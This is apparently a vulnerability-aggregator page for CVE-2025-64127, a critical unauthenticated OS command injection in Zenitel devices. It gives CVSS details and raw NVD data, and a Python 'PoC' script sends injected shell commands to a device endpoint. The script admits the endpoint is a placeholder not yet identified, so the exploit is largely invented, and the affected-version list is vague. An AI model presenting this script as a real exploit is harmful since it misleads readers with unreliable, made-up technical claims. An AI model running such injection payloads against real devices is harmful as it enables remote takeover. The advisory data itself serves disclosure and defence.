Security Vulnerability Report
中文
CVE-2025-64127 CVSS 10.0 CRITICAL

CVE-2025-64127

Published: 2025-11-26 18:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An OS command injection vulnerability exists due to insufficient sanitization of user-supplied input. The application accepts parameters that are later incorporated into OS commands without adequate validation. This could allow an unauthenticated attacker to execute arbitrary commands remotely.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Zenitel Connect < 最新安全更新版本
Zenitel AS系列设备 < 最新固件版本
Zenitel Station and Device Firmware Package (VS-IS) < 修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64127 PoC - OS Command Injection in Zenitel devices # Target: Zenitel Connect / AS Series devices # Note: This PoC is for educational and authorized testing purposes only import requests import sys def cve_2025_64127_poc(target_url, command="id"): """ Proof of Concept for CVE-2025-64127 OS Command Injection vulnerability in Zenitel devices Args: target_url: Base URL of the vulnerable Zenitel device command: OS command to execute (default: 'id') Returns: Response from the server """ # Target endpoint (to be identified from official advisory) endpoint = f"{target_url}/api/v1/execute" # Malicious payload with command injection # Using common command separators: ; | && || payload = { "param": f";{command}", # Alternative injection points may exist "command": f"test|{command}", } try: # Send request without authentication (PR:N) response = requests.post(endpoint, data=payload, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response:\n{response.text}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None def verify_vulnerability(target_url): """ Verify if target is vulnerable to CVE-2025-64127 """ print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-64127 OS Command Injection Test") # Test with benign command to confirm injection works cve_2025_64127_poc(target_url, "id") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64127-poc.py <target_url> [command]") print("Example: python cve-2025-64127-poc.py http://target.com id") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] if len(sys.argv) > 2 else "id" verify_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64127", "sourceIdentifier": "[email protected]", "published": "2025-11-26T18:15:49.243", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS command injection vulnerability exists due to insufficient \nsanitization of user-supplied input. The application accepts parameters \nthat are later incorporated into OS commands without adequate \nvalidation. This could allow an unauthenticated attacker to execute \narbitrary commands remotely."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json", "source": "[email protected]"}, {"url": "https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.